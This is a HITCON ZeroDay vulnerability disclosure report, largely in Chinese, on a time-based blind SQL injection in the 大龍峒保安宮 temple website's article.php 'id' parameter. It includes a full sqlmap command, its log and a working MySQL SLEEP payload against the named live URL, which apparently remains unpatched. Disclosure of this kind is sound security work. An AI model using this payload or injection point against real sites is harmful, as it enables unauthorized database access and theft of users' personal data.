大龍峒保安宮 time-based blind SQL Injection - HITCON ZeroDay

Vulnerability Detail Report

Vulnerability Overview

  • ZDID: ZD-2026-00911
  •  發信 Vendor: 大龍峒保安宮
  • Title: 大龍峒保安宮 time-based blind SQL Injection
  • Introduction: time-based blind SQL Injection

處理狀態

目前狀態

公開
Last Update : 2026/09/08
  • 新提交
  • 已審核
  • 已通報
  • 未回報修補狀況
  • 未複測
  • 公開

處理歷程

  • 2026/07/09 21:43:06 : 新提交 (由 J4sp3r__ 更新此狀態)
  • 2026/07/12 03:05:38 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/23 16:42:50 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/23 16:42:50 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/07/23 16:42:51 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
  • 2026/09/08 03:00:03 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

  • ZDID:ZD-2026-00911
  • 通報者:Jasper0811 (J4sp3r__)
  • 風險:高
  • 類型:資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料(包含大量使用者個資或敏感性資料),同時也有機會對資料進行破壞或修改。

漏洞說明: OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明: OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式: OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
(本欄位資訊由系統根據漏洞類別自動產生,做為漏洞參考資料。)

相關網址

https://www.baoan.org.tw/article.php?id=58

敘述

  1. 在首頁中,可以看到一個「社會公益」的按鈕
  2. 按下去後,可以發現網址變成「https://www.baoan.org.tw/article.php?id=58」
    圖片
  3. 推測此處 url 參數 「id」可能具有 SQL injection
  4. 使用 sqlmap 進行測試,可以發現回傳以下內容
❯ sqlmap -u 'https://www.baoan.org.tw/article.php?id=*'
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.10.5#stable}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:31:34 /2026-07-09/

custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] 

[21:31:35] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:31:35] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=ismg1513q5h...shor1bag63'). Do you want to use those [Y/n] 

[21:31:38] [INFO] checking if the target is protected by some kind of WAF/IPS
[21:31:38] [WARNING] reflective value(s) found and filtering out
[21:31:38] [INFO] testing if the target URL content is stable
[21:31:38] [WARNING] target URL content is not stable (i.e. content differs). sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison'
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] 

[21:31:39] [INFO] testing if URI parameter '#1*' is dynamic
[21:31:39] [INFO] URI parameter '#1*' appears to be dynamic
[21:31:40] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[21:31:40] [INFO] testing for SQL injection on URI parameter '#1*'
[21:31:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:31:42] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[21:31:42] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:31:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[21:31:44] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[21:31:45] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[21:31:46] [INFO] testing 'Generic inline queries'
[21:31:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[21:31:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[21:31:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[21:31:48] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[21:31:59] [INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 

for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] 

[21:32:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[21:32:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[21:32:14] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 

sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: #1* (URI)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: https://www.baoan.org.tw/article.php?id=' AND (SELECT 5979 FROM (SELECT(SLEEP(5)))cGeP) AND 'PByJ'='PByJ
---
[21:32:41] [INFO] the back-end DBMS is MySQL
[21:32:41] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
web application technology: PHP, Apache
back-end DBMS: MySQL >= 5.0.12
[21:32:42] [INFO] fetched data logged to text files under '/Users/zhengyuyou/.local/share/sqlmap/output/www.baoan.org.tw'
  1. 根據結果,回傳 time-based blind,因此可確認具有 time-based blind 漏洞。

擷圖

留言討論

聯絡組織

 發送私人訊息
您也可以透過私人訊息的方式與組織聯繫,討論有關於這個漏洞的相關資訊。
;